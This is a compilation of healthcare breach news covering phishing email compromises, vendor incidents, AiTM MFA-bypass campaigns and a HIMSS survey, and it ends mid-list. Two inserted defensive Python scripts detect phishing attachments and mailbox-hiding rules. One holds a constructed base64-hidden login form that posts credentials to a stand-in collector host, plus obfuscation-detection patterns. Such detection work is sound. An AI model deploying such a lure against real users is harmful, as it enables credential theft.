Phishing Attacks and Unauthorized Email Account Access Reported by 6 HIPAA Regulated Entities

21,500-Record Data Breach Reported by Police Department of the City of New York

Unauthorized persons gained access to the email system of the Administrative Fund of the Detectives’ Endowment Association of the Police Department of the City of New York (NYCDEA) and may have viewed or acquired the protected health information (PHI) of 21,544 persons.

Upon discovering suspicious activity in its email system on December 16, 2021, NYCDEA changed passwords to stop continuing unauthorized access and engaged third-party cybersecurity specialists to look into the unauthorized activity. Based on the breach report submitted to the Maine Attorney General, unauthorized third-party access to the email system and sensitive information was confirmed only on October 3, 2022. It is unknown why confirming the breach took so long.

The evaluation of the breached email accounts showed they included data such as names, addresses, dates of birth, driver’s license numbers, state ID card numbers, payment card details, financial account numbers, usernames and passwords, medical background, and medical insurance details. Notification letters were mailed to impacted persons on October 31, 2022. Credit monitoring, identity theft protection services and fraud consultation were provided to impacted persons.

Two Email Accounts Breached in Phishing Attack at Gateway Ambulatory Surgery Center

Gateway Ambulatory Surgery Center located in Concord, NC, has begun informing 18,479 patients that unauthorized individuals potentially accessed some of their PHI that was saved in email accounts. The medical center first discovered the email account breach on April 6, 2022. According to the third-party forensic investigation, unauthorized individuals accessed two employee email accounts from February 14, 2022 to May 10, 2022, after employees clicked on phishing emails.

It was confirmed by Gateway on September 1, 2022 that the email accounts included patient data, such as names, health benefit enrollment data, medical background, medical insurance data, dates of service, and patient account numbers. The driver’s license numbers and/or Social Security numbers of some patients were likewise exposed. Gateway sent notification letters on October 31, 2022, and offered free credit monitoring, identity restoration, and fraud consultation services to qualified patients.

Gateway stated it has implemented a new endpoint detection and response program and has given extra security awareness training to its employees.

Two Email Accounts Breached at Assurance Health System

Assurance Health System based in Indianapolis, IN offers senior inpatient psychiatric care services in central Indiana and Ohio. It recently reported that unauthorized persons accessed the email accounts of two employees. It is uncertain when the provider detected the unauthorized email account activity; however, the forensic investigation affirmed that an unauthorized third party accessed one email account from April 8, 2022 to April 21, 2022, and that there was other unauthorized access from June 10, 2021 to March 8, 2022. The health system finished the analysis of the email accounts on September 1, 2022, and began sending notifications to the 3,565 impacted people on October 28, 2022.

The breached email accounts held the PHI of patients of Assurance Health, Brightwell Behavioral Health facilities, and Anew Health, which include names, contact details, driver’s license numbers, Social Security numbers, birth dates, patient account numbers, medical record numbers, dates of treatment, treatment facilities, medical background, condition and diagnosis data, provider names, prescription data, and medical insurance details.

Persons who had their driver’s license numbers or Social Security numbers exposed were offered free credit monitoring and identity protection services. Assurance Health System stated that it implemented extra safety measures and technical security procedures to further secure and keep track of its email system.

2,915 Patients of Native American Rehabilitation Association of the Northwest were Affected by Email Breach

Native American Rehabilitation Association of the Northwest (NARA NW) based in Portland, OR has submitted a breach report involving the email accounts of seven staff members. NARA NW detected suspicious activity inside its email system on September 1, 2022 and took quick action to stop continuing unauthorized access. The analysis of the impacted email accounts showed unauthorized access from August 31 to September 1 by a third party located outside America.

The email accounts included patient data such as names, birth dates, and non-sensitive treatment data. Four of the 2,915 impacted persons had their Social Security numbers compromised. Those persons were given free credit monitoring services for one year.

NARA NW stated it was ready for such incidents and had the technology in place to immediately determine the particular emails and data that were accessed; nevertheless, additional safety measures have already been implemented, such as limiting the use of cloud-based email, blocking access from outside the United States, and using multi-factor authentication for email accounts.

Work Health Solutions Email Account Breach

Occupational healthcare provider Work Health Solutions in San Jose, CA recently reported that an unauthorized third party accessed an employee’s email account from February 16, 2022 to March 24, 2022. The provider immediately secured the email account and started a forensic investigation. The account evaluation that was conducted confirmed the potential breach of PHI on October 11, 2022. Full names, driver’s license numbers, Social Security numbers, medical insurance data, and/or medical data may have been compromised.

Work Health Solutions sent notification letters to impacted persons on November 9, 2022 and offered free credit monitoring services to those who had their Social Security numbers affected. The incident is not yet posted on the HHS’ Office for Civil Rights breach website, so it is presently uncertain how many persons were impacted.

Three Rivers Provider Network Reports Unauthorized Email Account Activity

Three Rivers Provider Network based in Las Vegas, NV recently announced an employee email account breach that affected sensitive patient data such as names, birth dates, addresses, passport numbers, Social Security numbers, state-issued ID numbers, driver’s license numbers, and health data.

The company detected the unauthorized activity on June 3, 2022, and confirmed the exposure of PHI on August 17, 2022. No report of patient data misuse had been received at the time notifications were issued. The affected individuals received notification letters on November 5, 2022, along with offers of free credit monitoring services for 24 months.

Data Breaches at Main Line Women’s Healthcare, Fred Hutchinson Cancer Center, and Seton Medical Center Harker Heights

An ex-employee of Main Line Women’s Healthcare located in Bryn Mawr, PA, was found to have been viewing and taking photos of patient data using a personal mobile phone. The breach investigation revealed that the information of 804 OB/GYN practice patients was viewed and photographed.

As soon as the HIPAA violation was discovered, the worker was promptly suspended. The provider started an internal investigation to find out the magnitude of the privacy violation and the types of data obtained. The compromised records contained patient names, birth dates, addresses, medical account numbers, insurance companies, treating doctors, prescription drugs, and diagnoses.

The employee worked at Main Line Women’s Healthcare from February 7, 2022 to June 14, 2022; that employment has now ended as a result of the HIPAA breach. A representative for Main Line Women’s Healthcare stated it cannot ascertain the employee’s motives, nor whether the copied data was improperly used or further exposed. The privacy breach was reported to the police and Main Line Women’s Healthcare is helping with the investigation.

The provider finished the analysis of the data on September 7, 2022, and sent notification letters on October 10. The late issuance of notification letters was because of the time used to get updated contact details. Free credit monitoring services were provided to impacted persons.

Email Account Breach at Fred Hutchinson Cancer Center, WA

Fred Hutchinson Cancer Center located in Seattle, WA, previously called Seattle Cancer Care Alliance, has found out that an unauthorized person had accessed a staff email account. The incident was discovered on March 26, 2022, upon noticing suspicious activity in the email account. After securing the email account immediately, the center started a forensic investigation to find out the nature and extent of the data breach.

Fred Hutchinson Cancer Center uncovered on April 18, 2022, that an unauthorized individual accessed the email account from March 25 to March 26, 2022. A team was created to review all the documents contained in the account and find out how many persons were impacted and the types of data that were viewed. That process was finished on September 9, 2022, and since contact details had been updated, the center began sending notification letters. The types of data compromised were different from one patient to another but might have contained names, addresses, financial account details, Social Security numbers, medical data, and/or medical insurance data. Fred Hutchinson Cancer Center stated it is not aware of any improper use of patient data.

Any person whose Social Security or government ID number was exposed is eligible to receive one year of free credit monitoring and identity theft protection services. The incident is not yet posted on the HHS’ Office for Civil Rights breach website, so the number of affected persons is presently uncertain.

Phishing Attack at Seton Medical Center Harker Heights

HH Killeen Health System, which manages Seton Medical Center Harker Heights based in Texas, has begun informing 15,056 patients about the potential exposure and theft of some of their PHI by unauthorized persons.

The breach happened at a vendor employed by Seton Medical Center Harker Heights. Unauthorized individuals accessed the email accounts of two employees after the employees responded to phishing emails. The medical center immediately secured the accounts to stop further unauthorized access. It conducted a forensic investigation to find out the scope of the breach. Based on the notification letter given to the Texas Attorney General, the attackers acquired access to the names and medical data of patients.

Evernote Phishing Campaign Targets Healthcare Companies

A phishing campaign targeting healthcare companies has been discovered. The emails use an Evernote-themed lure to fool recipients into opening a Trojan file that displays a login prompt to steal information.

The Health Information Cybersecurity Coordination Center (HC3) just released an advisory concerning the campaign that has targeted a number of healthcare companies in the U.S. The malicious emails sent to targeted companies have a malicious URL that leads to an Evernote-themed webpage. The phishing emails are customized and the baits employed may differ; nonetheless, the emails noticed by HC3 include the subject “[Name of Organization] [Date] Business Review” and contain a Secure Message motif.

The URL provided in the email message takes the recipient to the Evernote website, where they are advised to save an HTML file named message (3).html. The file contains JavaScript code that renders an Adobe- or Microsoft-themed page that tries to collect Outlook, AOL, IONOS, and other credentials.

After acquiring credentials via phishing campaigns like this, cyber threat actors can access email accounts that may hold substantial amounts of sensitive information, such as protected health information (PHI). Compromised email accounts may be used to conduct phishing attacks internally and could give threat actors a foothold for more significant attacks on the company. Many ransomware attacks begin with phishing emails.

Ways to safeguard against phishing attacks include a mix of measures, such as email security tools for stopping phishing emails, web filters for hindering access to malicious sites that prompt malware download, antivirus software programs that recognize Trojans as well as other malicious code, and multifactor authentication to prevent unauthorized access to the email system. It is also crucial to give the workforce frequent security awareness training regarding phishing threats and teach employees to identify phishing emails.
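A static triage pass that an email gateway or analyst could run over a saved HTML attachment of the kind described above, where script builds the login prompt at open time. This is an added example, not code from HC3 or from the original article; the function names, the scoring rule, the sample files and the host collector.example are constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

BRANDS = ("outlook", "aol", "ionos", "microsoft", "adobe")  # brands named in the article
# Long base64 string literals inside script are a common wrapper for hidden markup.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{40,}={0,2})["']""")
DYNAMIC_MARKUP = re.compile(r"document\.write|innerHTML|atob\s*\(|unescape\s*\(|eval\s*\(")


class AttachmentScan(HTMLParser):
    """Collects password fields, remote form targets and script bodies."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.password_fields = 0
        self.remote_targets = set()
        self.scripts = []
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag == "input" and attr.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "form":
            host = urlparse(attr.get("action", "")).hostname
            if host:  # a local file posting to a remote host
                self.remote_targets.add(host)
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)


def triage(html, depth=0):
    """Scan markup, then decode base64 literals in script and scan those too."""
    scan = AttachmentScan()
    scan.feed(html)
    scan.close()
    script = "\n".join(scan.scripts)
    lowered = html.lower()
    findings = {
        "password_fields": scan.password_fields,
        "remote_targets": set(scan.remote_targets),
        "dynamic_markup": bool(DYNAMIC_MARKUP.search(script)),
        "brands": {b for b in BRANDS if b in lowered},
        "decoded_layers": 0,
    }
    if depth >= 3:  # bound the recursion on nested encodings
        return findings
    for blob in B64_LITERAL.findall(script):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8")
        except ValueError:  # not base64, or not text once decoded
            continue
        sub = triage(inner, depth + 1)
        findings["password_fields"] += sub["password_fields"]
        findings["remote_targets"] |= sub["remote_targets"]
        findings["brands"] |= sub["brands"]
        findings["dynamic_markup"] |= sub["dynamic_markup"]
        findings["decoded_layers"] = max(findings["decoded_layers"], 1 + sub["decoded_layers"])
    return findings


def verdict(findings):
    hidden = findings["decoded_layers"] > 0
    if findings["password_fields"] and (hidden or findings["remote_targets"]):
        return "credential-lure"
    if findings["dynamic_markup"] and hidden:
        return "review"
    return "no-indicators"


# Constructed samples: a login form hidden behind one encoding layer, and a plain page.
HIDDEN_FORM = ('<form action="https://collector.example/submit" method="post">'
               '<h1>Outlook sign in</h1><input type="email" name="u">'
               '<input type="password" name="p"></form>')
SAMPLE_LURE = ('<html><body><script>document.write(atob("'
               + base64.b64encode(HIDDEN_FORM.encode()).decode()
               + '"));</script></body></html>')
SAMPLE_BENIGN = ('<html><body><h1>Quarterly review</h1><p>Figures attached.</p>'
                 '<script>console.log("loaded")</script></body></html>')

if __name__ == "__main__":
    for name, doc in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(name, verdict(triage(doc)))
```

A static pass like this only sees encodings it knows how to unwrap, so a "no-indicators" result on an unexpected HTML attachment is not a clean bill of health.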

Additional data on this phishing campaign, together with other suggested mitigations, are available in the HC3 security advisory.

Data Breaches Reported by St. Luke’s Health System, Allegheny Health Network, Central Maine Medical Center, and Granbury Eye Clinic

St. Luke’s Health System based in Boise, ID, has just submitted a data breach report to the HHS’ Office for Civil Rights that impacted 31,579 individuals. The breach took place in May 2022 at Kaye-Smith, which is a billing vendor of the company. The patients invoiced that month were impacted by the incident. Kaye-Smith learned about the breach in June 2022 and informed St. Luke’s Health System on July 6, 2022.

Unauthorized people got access to the network at Kaye-Smith, which held data including patient names, insured names, telephone numbers, addresses, ID numbers, dates of birth, services descriptions, amounts invoiced, payment due dates, outstanding bills, status of accounts, and Social Security numbers. The FBI is helping Kaye-Smith look into the breach to better understand how the breach took place.

St. Luke’s Health System mentioned it terminated its association with the billing provider. The investigation at this point has not found any information that indicates patient information misuse. Impacted persons got a free credit monitoring service membership.

Allegheny Health Network Phishing Attack Impacts 1000s of Patients

Allegheny Health Network located in Pennsylvania has recently confirmed that an unauthorized third party viewed the email account of a worker after the worker responded to a phishing email. On May 31, 2022, the worker responded to the email message and the breach was noticed the next day.

An analysis of the email account affirmed that PHI such as names, birth dates, dates of medical services, medical backgrounds, health ailments, diagnoses and treatment data, and driver’s license numbers was held in the account. Some of the patients additionally had their Social Security number and/or financial details compromised.

Allegheny Health Network stated immediate action was taken to handle the incident, such as performing a password reset to prevent further unauthorized access. A third-party cybersecurity agency has additionally helped to strengthen its security settings.

Allegheny Health Network has sent the breach report to the HHS’ Office for Civil Rights with a placeholder of 500 records until the breach is completely investigated and the number of people affected is identified. The local press has mentioned approximately 8,000 persons were impacted.

Central Maine Medical Center Impacted by Data Breach at Shields Healthcare Group

Central Maine Medical Center (CMMC) has affirmed the impact of a data breach at Shields Healthcare Group on its organization. CMMC was one of the 56 facility partners impacted by the breach. Approximately 2 million persons were affected, including 11,938 patients of CMMC.

Granbury Eye Clinic Located in Texas Affected by Data Breach at Eye Care Leaders

Granbury Eye Clinic located in Texas is the most recent eye care company to affirm being impacted by the Eye Care Leaders data breach, which affected the PHI of 16,475 individuals. The data breach is currently known to have impacted a minimum of 39 eye care companies, along with 3,091,694 patients.

More than 10,000 Companies Attacked in Ongoing MFA-Bypassing Phishing and BEC Campaign

Microsoft has warned about a large phishing campaign aimed at Office 365 credentials that circumvents multi-factor authentication (MFA). The campaign is ongoing, and over 10,000 companies were targeted by attackers in the last 10 months.

According to a report by Microsoft, one of the phishing campaigns used emails with HTML file attachments. The email tells the user that they have received a Microsoft voicemail message and that the HTML file must be opened in order to see the message. The HTML file acts as a gatekeeper, making sure the targeted user arrives at the URL by being redirected from the file attachment.

The user is taken to a web page that runs a known open source phishing kit, which is used to collect credentials. The user is prompted to log in to their Microsoft account to be able to access the voicemail. After signing in, the user is told that an MP3 voicemail message will be sent as an attachment to an email message within an hour. The email address of the user is auto-filled into the sign-in window, so only the password needs to be entered by the user.

This campaign is known as an adversary-in-the-middle (AiTM) phishing attack. The phishing site sits between the targeted user and the real site they intend to log into. Two distinct Transport Layer Security (TLS) sessions are used: one between the user and the attacker, and the other between the attacker and the real site.

After the user enters credentials on the attacker-controlled page, the user is directed to the real web page. Content from the real site is returned to the attacker, who passes it on to the user. In addition to the credentials, the session cookies are stolen. The session cookie is then used in a browser to bypass the authentication process, which works even when multi-factor authentication is enabled. The phishing kit automates the whole process.

As soon as the attacker has access to the user's Office 365 email, the messages in the account are reviewed to identify possible targets for the next stage of the phishing attack. The attacker then creates mailbox rules that mark selected messages as read and move them to the archive to keep the user from noticing that the mailbox has been compromised. Afterward, the attacker conducts a business email compromise (BEC) scam on the targets.

Message threads are hijacked, and the attacker adds their own content to try to get the targeted individual to send a fraudulent wire transfer to the attacker’s account. Because the emails are replies to earlier messages, the recipient is likely to think they are in genuine communication with the account owner, when they are actually conversing with the attacker.

Microsoft stated it takes less than five minutes after stealing the credentials and session cookies to send the first BEC email. With all responses to the request being archived automatically, the attacker can simply check the archive for responses, and does so every couple of hours. They are also able to find more prospective targets for BEC scams. Although the account compromise is automated, the BEC attacks appear to be performed manually. Any email messages sent or received are deleted one by one from the archive and sent folder to avoid discovery. BEC attacks like this can involve fraudulent transactions of up to millions of dollars.

Protecting against these attacks requires advanced email security solutions that check incoming and outgoing email messages and can also block access to malicious web pages, for instance, an email security solution and a DNS filter. Microsoft also suggests using conditional access policies that restrict account access to particular devices or IP addresses, and advises continuously monitoring email for suspicious or anomalous activity, for example, sign-in attempts with suspicious characteristics.
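One way to turn that monitoring advice into a check is to correlate the mailbox rule described above (mark as read, move to the archive) with the session it was created in. This is an added example, not Microsoft's detection logic; the event schema, the per-user address baseline, the one-hour correlation window and all sample events are constructed assumptions, and only MarkAsRead and MoveToFolder follow Exchange's New-InboxRule parameter names.

```python
from datetime import datetime, timedelta

# Constructed sample events in a hypothetical normalized schema (not a vendor log format).
EVENTS = [
    {"time": "2022-07-12T09:01:10", "type": "signin", "user": "alice@corp.example",
     "session": "s-100", "ip": "198.51.100.7", "mfa": True},
    {"time": "2022-07-12T09:03:40", "type": "mail_access", "user": "alice@corp.example",
     "session": "s-100", "ip": "192.0.2.55"},
    {"time": "2022-07-12T09:05:02", "type": "inbox_rule", "user": "alice@corp.example",
     "session": "s-100", "ip": "192.0.2.55",
     "params": {"MarkAsRead": True, "MoveToFolder": "Archive"}},
    {"time": "2022-07-12T10:15:00", "type": "signin", "user": "bob@corp.example",
     "session": "s-200", "ip": "203.0.113.20", "mfa": True},
    {"time": "2022-07-12T10:20:00", "type": "inbox_rule", "user": "bob@corp.example",
     "session": "s-200", "ip": "203.0.113.20",
     "params": {"MoveToFolder": "Newsletters"}},
    {"time": "2022-07-12T11:00:00", "type": "signin", "user": "carol@corp.example",
     "session": "s-300", "ip": "203.0.113.30", "mfa": True},
    {"time": "2022-07-12T11:30:00", "type": "inbox_rule", "user": "carol@corp.example",
     "session": "s-300", "ip": "203.0.113.30",
     "params": {"MarkAsRead": True, "MoveToFolder": "Archive"}},
]
# Constructed baseline: addresses each user normally signs in from.
BASELINE = {
    "alice@corp.example": {"203.0.113.10"},
    "bob@corp.example": {"203.0.113.20"},
    "carol@corp.example": {"203.0.113.30"},
}


def hides_mail(params):
    """True for the rule shape the article describes: mark as read and move to the archive."""
    folder = str(params.get("MoveToFolder", "")).strip().lower()
    return bool(params.get("MarkAsRead")) and folder == "archive"


def find_aitm_chains(events, baseline, window=timedelta(hours=1)):
    """Flag mail-hiding rules and raise severity when the session itself looks relayed."""
    sessions = {}
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        sid = ev["session"]
        if ev["type"] == "signin":
            # In an AiTM relay the identity provider sees the proxy's address, not the user's.
            sessions[sid] = {
                "start": when,
                "ips": set(),
                "mfa": ev.get("mfa", False),
                "off_baseline": ev["ip"] not in baseline.get(ev["user"], set()),
            }
        state = sessions.get(sid)
        if state is not None:
            state["ips"].add(ev["ip"])
        if ev["type"] != "inbox_rule" or not hides_mail(ev.get("params", {})):
            continue
        reasons = ["rule marks mail read and archives it"]
        if state is not None and when - state["start"] <= window:
            if state["off_baseline"]:
                reasons.append("sign-in from address outside user baseline")
            if len(state["ips"]) > 1:
                reasons.append("session token used from more than one address")
            if state["mfa"] and len(reasons) > 1:
                reasons.append("MFA was satisfied in this session")
        alerts.append({
            "user": ev["user"],
            "session": sid,
            "time": ev["time"],
            "severity": "high" if len(reasons) > 1 else "low",
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_aitm_chains(EVENTS, BASELINE):
        print(alert["severity"], alert["user"], "; ".join(alert["reasons"]))
```

The rule on its own is reported at low severity because some users create it legitimately; it is the combination with an unfamiliar sign-in address or a session token seen from two addresses that matches the chain described in the report.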

With regard to the bypass of MFA, Microsoft highlights that although AiTM attacks can get around MFA, MFA is still an essential security measure and is effective at preventing many threats. Microsoft recommends making MFA “phish-resistant” by using solutions that support Fast IDentity Online (FIDO) v2.0 as well as certificate-based authentication.

Security Breaches at Atrium Health and Heartland Healthcare Services Reported

Patient Data Likely Exposed in Atrium Health Phishing Attack

Atrium Health based in Charlotte, NC reported a phishing incident that compromised the protected health information (PHI) of 6,695 individuals who received services from Atrium Health at Home. A staff member clicked a link in a phishing email on April 7, 2022 and exposed the credentials for an email account. Atrium Health detected the breach on April 8 and blocked the unauthorized access right away.

From April 7 to April 8, the unauthorized third party utilized the account for sending other phishing emails, which indicates that acquiring patient data saved in the account wasn’t the purpose of the phishing attack, though it cannot be determined whether any patient data was seen or acquired.

An analysis of the email messages and file attachments within the account showed they included patients’ complete names, residential addresses, dates of birth, medical insurance data, and medical data (including medical record number, service dates, facility and provider and/or diagnosis and treatment details). The financial account data, Social Security numbers, and/or driver’s license/state ID numbers of some persons were also exposed. Atrium Health stated there were no reported instances of patient data misuse.

Affected persons received breach notification letters. Those who had either their Social Security number, driver’s license number, or financial account information exposed received free credit monitoring and identity theft protection services. Security measures have been improved and Atrium Health stated it will continue to give its employees regular phishing training.

Patient Data Theft Due to Heartland Healthcare Services Ransomware Attack

Heartland Healthcare Services based in Toledo, OH, has reported the exfiltration of files that contain patient information from its system during a ransomware attack in April 2022. The attack was discovered on April 11 when the employees could not access files on its system.

Heartland Healthcare Services mentioned that the attacker issued a ransom demand; however, after contacting the Federal Bureau of Investigation, it decided not to pay the ransom. Part of the stolen data was uploaded to the dark web data leak website of the ransomware group.

A review of the impacted files showed they included the PHI of 2,763 individuals who got medicines via Heartland Healthcare Services, which include Heartland Pharmacy of Pennsylvania, Heartland Pharmacy of Illinois, or Heartland Pharmacy of Maryland. The stolen information contained names, phone numbers, addresses, medicine names, and other medication-associated data.

Heartland Healthcare Services claimed it has strengthened its security procedures to prevent similar attacks in the future.

Spokane Regional Health District and Catholic Health Announce Data Breaches

Spokane Regional Health District (SRHD) located in Washington has again experienced a phishing attack. This is the second time this year that the health district has reported the potential compromise of patient data after a staff member responded to a phishing email.

SRHD announced on March 24, 2022 that its IT unit identified a compromised email account. The investigation has just confirmed that a staff member replied to a phishing email on February 24, 2022, and subsequently shared credentials that enabled the account to be accessed. Last week, SRHD stated that the email account stored the protected health information (PHI) of 1,260 people. An unauthorized individual may have ‘previewed’ that data, although no evidence was found that suggests the access or download of information.

The account contained names, birth dates, service dates, source of referral, healthcare provider name, diagnosing status, whether the patient was located, date placed, patient risk level, staging level, how medicines were obtained, test type, test result, treatment details, medication data, delivery dates and any remedies offered to the baby, diagnostic data, medical details, and client notes.

An SRHD spokesperson stated corrective measures were taken to mitigate the current incident and avoid further phishing attacks, such as reinforcing worker cybersecurity training, employing multifactor authentication, and carrying out testing on its systems.

Similar to the other parts of the state of Washington, SRHD has encountered a record-level surge in phishing emails as well as malware installation attempts. In this incident, staff members fell victim to a phishing scam that exposed confidential data to data thieves. SRHD Deputy Administrative Officer Lola Phillips expressed their strong dedication to protecting personal data and minimizing the possibility of future attacks.

On January 24, 2022, SRHD reported the compromise of an employee email account on December 21, 2021. The email account comprised the sensitive information of 1,058 persons, which include names, dates of birth, counselor names, case numbers, test findings and dates of urinalysis, medicines, and date of the last dose.

Subsequent to that attack, SRHD mentioned it will be enhancing worker cybersecurity training, using multifactor authentication, and doing tests on its systems.

Catholic Health Informs Patients Regarding Data Theft at a Business Associate

Catholic Health has lately begun informing roughly 1,300 patients concerning the exposure of some of their PHI in a cyberattack encountered by Ciox Health, its business associate.

Ciox Health based in Buffalo, NY offers health data management services to hospitals and insurance companies. From June 24, 2021 to July 2, 2021, emails and file attachments in the email account of a Ciox Health worker had been downloaded by an unauthorized person.

The breach was noticed last year and Ciox Health learned in September 2021 that the email account comprised patient data associated with billing queries and customer support requests. An assessment of the data within the account was done at the beginning of November and impacted healthcare providers and insurance companies were informed from November 23 to December 30, 2021.

Catholic Health stated the breached data included names of patients, healthcare provider names, birth dates, dates of service, medical insurance details, and/or medical record numbers. Although Ciox’s investigation didn’t uncover any cases of fraud or identity theft because of this incident, as a safety precaution, Ciox is informing impacted Catholic Health patients.

HIMSS Cybersecurity Survey Reveals the Human Factor is the Biggest Vulnerability in Healthcare

HIMSS has released the results of its 2021 Healthcare Cybersecurity Survey which revealed that 67% of respondents have had at least one significant security event in the past 12 months, with the biggest security breaches the consequence of phishing attacks.

The 2021 HIMSS Healthcare Cybersecurity Survey was performed on 167 healthcare cybersecurity specialists, who had at least some accountability for daily cybersecurity operations or oversight.

The surveyed IT experts were questioned concerning the major security breaches they had encountered in the last 12 months, and in 45% of instances it was a phishing attack, and 57% of survey participants stated the most significant breach involved phishing. Phishing attacks are most frequently carried out through email. 71% of the most significant security incidents are email-based phishing attacks; nonetheless, 27% mentioned there was a significant voice phishing incident (vishing), 21% stated they had many SMS phishing incidents (smishing), and 16% mentioned there were many social media phishing incidents.

Phishing was the most frequent preliminary point of compromise, accounting for 71% of the most critical security breaches. Next are social engineering attacks at 15%. Human error is often the reason for critical data breaches, making up 19% of the major security breaches, with 15% due to the extended use of legacy software for which support is not provided anymore. The survey additionally showed fundamental security controls were not completely implemented at many companies.

Ransomware attacks continue to trouble the medical care sector, and the attacks frequently result in major disruption and have huge mitigation costs. 17% of respondents reported the most critical security incident they experienced was a ransomware attack. 7% of survey participants stated negligent insider activity brought about the greatest security incident, although HIMSS remarks that healthcare firms frequently do not have strong defenses against insider breaches, thus it is likely that these kinds of breaches were underreported.

Considering the extent to which phishing results in account exposures or serious cyberattacks, it is essential for healthcare companies to employ effective email security measures to stop phishing emails and to also invest in security awareness training for employees. No single security solution can block all phishing attacks, so it is essential for the workforce to be trained to recognize phishing and social engineering attacks. Training employees in security best practices can help to minimize the human error that often causes data breaches.

The continued use of legacy systems after they reach end-of-life can be a problem in healthcare. Plans must be made to upgrade obsolete programs, and if that is not possible, mitigations ought to be applied to make exploitation of vulnerabilities more difficult, for instance, isolating legacy systems and not exposing them to the web.

44% of survey respondents stated their biggest breach had no or negligible impact; nevertheless, 32% mentioned security breaches resulted in disruption to systems that impacted business functions, 26% said security breaches interrupted IT systems, and 22% reported security breaches led to data breaches or data leakage. 21% stated the security breaches had affected clinical care, and 17% mentioned the most critical security incident ended in financial loss.

In spite of the risk of cyberattacks, funds for cybersecurity budgets stay slim. 40% of surveyed IT specialists stated 6% or less of their IT budget was spent on cybersecurity, which is the same percent as the last four years even if the risk of attacks has grown. 40% of survey participants mentioned they either had funding that has not changed since last year or had diminished, and 35% stated their cybersecurity funding is not expected to change.

The HIMSS survey questioned respondents to learn about the biggest security problems, which for 47% of participants was inadequate budget. Staff compliance with policies and procedures was a big obstacle for 43% of respondents, the continuing use of legacy software programs was a problem for 39% of participants, and 34% stated they had trouble with patch and vulnerability management.

Workers making errors, identity and access management, device management, building a cybersecurity culture, data leaks, and shadow IT were likewise considered as big security issues.

The discoveries of the 2021 HIMSS Healthcare Cybersecurity Survey show that healthcare providers still have substantial difficulties to overcome. These obstacles to progress include limited security budgets, growing legacy footprints, and the increasing volume of cyber-attacks and compromises. Furthermore, standard security controls were not fully enforced at numerous organizations. Maybe the major vulnerability is the human factor. Healthcare companies ought to do more to support healthcare cybersecurity experts and their cybersecurity programs.

Newest Phishing Kits Used for Multi-Factor Authentication Bypass

Phishing attacks enable threat actors to acquire credentials; however, multi-factor authentication (MFA) makes it more difficult for phishing attacks to succeed. With MFA turned on, one more method of authentication is required besides a username and password before account access is granted. Microsoft has previously stated that multi-factor authentication blocks 99.9% of automated account compromise attacks. Nonetheless, MFA does not guarantee protection. A new kind of phishing kit is increasingly being used to circumvent MFA.

Proofpoint researchers revealed in a new blog article that phishing kits now in use rely on a transparent reverse proxy (TRP), which facilitates browser man-in-the-middle (MitM) attacks. The phishing kits allow the attackers to intercept browser sessions and steal credentials and session cookies in real time, permitting full account control without alerting the victim.

Several phishing kits that enable the bypass of MFA can typically be purchased cheaply. Some are basic with no extra functionality, while others are more advanced, with a few layers of obfuscation and modules for a variety of functions, such as the theft of sensitive data including passwords, credit card numbers, Social Security numbers, and MFA tokens.

In common phishing attacks, the attackers build a bogus login page to deceive visitors into sharing their credentials. Quite often the phishing page is a carbon copy of the website it impersonates, with the web address as the only indicator that the phishing page is not real. One MitM phishing kit discovered by the Proofpoint staff doesn't use these bogus pages; instead, it uses TRP to present the legitimate landing page to the visitor. This strategy makes it difficult for victims to identify the phishing scam. As soon as a user visits the page and a request is transmitted to that service, Microsoft 365 for instance, the attackers record the username and password even before they are sent and capture, in real time, the session cookies that are returned in response.

The researchers refer to a review of MitM phishing kits by Stony Brook University and Palo Alto Networks, which found more than 1,200 phishing websites employing MitM phishing kits. Worryingly, these phishing web pages are frequently not discovered and blocked by security solutions. 43.7% of the domains and 18.9% of the IP addresses were not listed on common blocklists, for example, those managed by VirusTotal. Additionally, although regular phishing pages usually only have a lifespan of about 24 hours before being blacklisted, MitM phishing pages last a lot longer. 15% of those found lasted for longer than 20 days before being added to blocklists.

The usage of these phishing kits is growing, though fairly slowly. Proofpoint experts think that threat actors will adopt MitM phishing kits a lot more widely in response to the greater use of MFA. MitM phishing kits are simple to set up, free to use, and have been confirmed effective at evading detection. The industry must be ready to handle blind spots like these before they evolve in new, unexpected directions.

PHI of 138,000 People Exposed Because of 3 Email Security Incidents

Hackers have acquired access to email accounts that contain protected health information (PHI) at Volunteers of America Southwest California, Injured Workers Pharmacy, and iRise Florida Spine and Joint Institute.

Injured Workers Pharmacy

Injured Workers Pharmacy, based in Andover, MA, has recently reported a data breach to the Maine Attorney General. The incident was discovered on or about May 11, 2021, when suspicious activity was seen in an employee’s email account. The pharmacy immediately secured the email account and engaged third-party computer forensics professionals to investigate the attack. The investigation confirmed the compromise of 7 email accounts from January 16, 2021 to May 12, 2021.

Third-party data review experts were engaged to look at the emails and file attachments in the exposed accounts, and affirmed they included the PHI of 75,771 people, such as names, addresses, and Social Security numbers. Following the review, Injured Workers Pharmacy confirmed the results, and that process was finished on or about December 14, 2021. The pharmacy began sending notification letters to affected individuals on February 3, 2022.

Injured Workers Pharmacy mentioned it has augmented its email security measures and is giving some impacted persons complimentary credit monitoring and identity restoration services.

iRise Florida Spine and Joint Institute

The iRise Florida Spine and Joint Institute has discovered that an employee email account containing the protected health information of 61,595 patients was accessed by an unauthorized individual. The forensic investigation revealed the hacker had access to the email account between February 24, 2021 and February 26, 2021.

A thorough assessment of email messages and attachments was performed, and the process was completed on November 22, 2021. iRise stated the following types of information were potentially viewed or obtained at the time of the attack: names, dates of birth, diagnoses, clinical treatment data, physician and/or hospital name, dates of service, and health insurance details. The Social Security numbers, driver’s license numbers, financial account details, credit card numbers, and/or usernames and passwords of a few persons were likewise exposed.

